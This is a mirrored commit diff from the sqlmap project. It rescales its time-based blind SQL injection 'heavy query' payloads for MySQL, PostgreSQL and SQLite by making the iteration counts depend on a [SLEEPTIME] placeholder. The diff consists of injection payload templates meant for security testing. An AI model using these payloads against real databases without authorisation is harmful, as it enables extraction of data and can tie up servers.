mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-02-02 20:54:13 +03:00
number crunching based time payloads are now affected by conf.timeSec
This commit is contained in:
parent
d0936bc8ed
commit
4f01d4c109
|
@ -1227,7 +1227,7 @@ Formats:
|
|||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<request>
|
||||
<payload>; SELECT BENCHMARK(5000000, MD5('[SLEEPTIME]'));</payload>
|
||||
<payload>; SELECT BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'));</payload>
|
||||
<comment>#</comment>
|
||||
</request>
|
||||
<response>
|
||||
|
@ -1266,7 +1266,7 @@ Formats:
|
|||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<request>
|
||||
<payload>; SELECT [RANDNUM] WHERE EXISTS(SELECT * FROM GENERATE_SERIES(1, 3000000));</payload>
|
||||
<payload>; SELECT [RANDNUM] WHERE EXISTS(SELECT * FROM GENERATE_SERIES(1, [SLEEPTIME]000000));</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
|
@ -1383,7 +1383,7 @@ Formats:
|
|||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<request>
|
||||
<payload>; SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(100000000))));</payload>
|
||||
<payload>; SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))));</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
|
@ -1446,9 +1446,9 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>AND IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
|
||||
<vector>AND IF(([INFERENCE]), [RANDNUM], BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</vector>
|
||||
<request>
|
||||
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||
<payload>AND BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
|
@ -1465,9 +1465,9 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, 3000000)) ELSE [RANDNUM] END)</vector>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, 3000000))</payload>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
|
@ -1541,9 +1541,9 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(100000000))))) ELSE [RANDNUM] END)</vector>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(100000000))))</payload>
|
||||
<payload>AND [RANDNUM]=LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
|
@ -1605,9 +1605,9 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>2</where>
|
||||
<vector>OR IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
|
||||
<vector>OR IF(([INFERENCE]), [RANDNUM], BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</vector>
|
||||
<request>
|
||||
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||
<payload>OR BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
|
@ -1616,7 +1616,7 @@ Formats:
|
|||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL OR time-based blind (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
|
@ -1624,9 +1624,9 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, 3000000)) ELSE [RANDNUM] END)</vector>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, 3000000))</payload>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
|
@ -1700,9 +1700,9 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(100000000))))) ELSE [RANDNUM] END)</vector>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(100000000))))</payload>
|
||||
<payload>OR [RANDNUM]=LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
|
|
Loading…
Reference in New Issue
Block a user